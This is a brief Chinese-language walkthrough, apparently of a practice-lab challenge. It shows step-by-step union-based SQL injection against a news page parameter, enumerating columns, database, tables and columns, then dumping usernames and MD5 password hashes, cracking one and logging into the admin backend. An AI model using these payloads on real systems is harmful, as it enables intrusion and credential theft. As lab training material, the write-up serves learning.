首先进入所给的界面,发现箭头所指处有一个可疑页面
通过简单的分析,这个地方存在SQL注入
去网上寻找相关资料,
首先使用order by 来判断有几个字段,返回内容正常,可以确定有4列。
new_list.php?id=1 and 1=2 union select 1,2,3,4
2和3应该是有东西的,
?id=1 and 1=2 union select 1,database(),version(),4
得到数据库和版本信息
union select 1,table_name,3,4 from information_schema.tables where table_schema=‘数据库名’ 判断表名为StormGroup_member
union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=‘StormGroup_member’ 判断列名为id,user,passpord,status
union select 1,group_concat(user),3,4 from StormGroup_member 获得用户名为mozhe,mozhe
union select 1,group_concat(status),group_concat(password),4 from StormGroup_member 获得两个MD5加密的密码和相应的状态
使用在线解密工具解密状态为1的password,获得未加密的密码
将解密后的密码输入,成功登入后台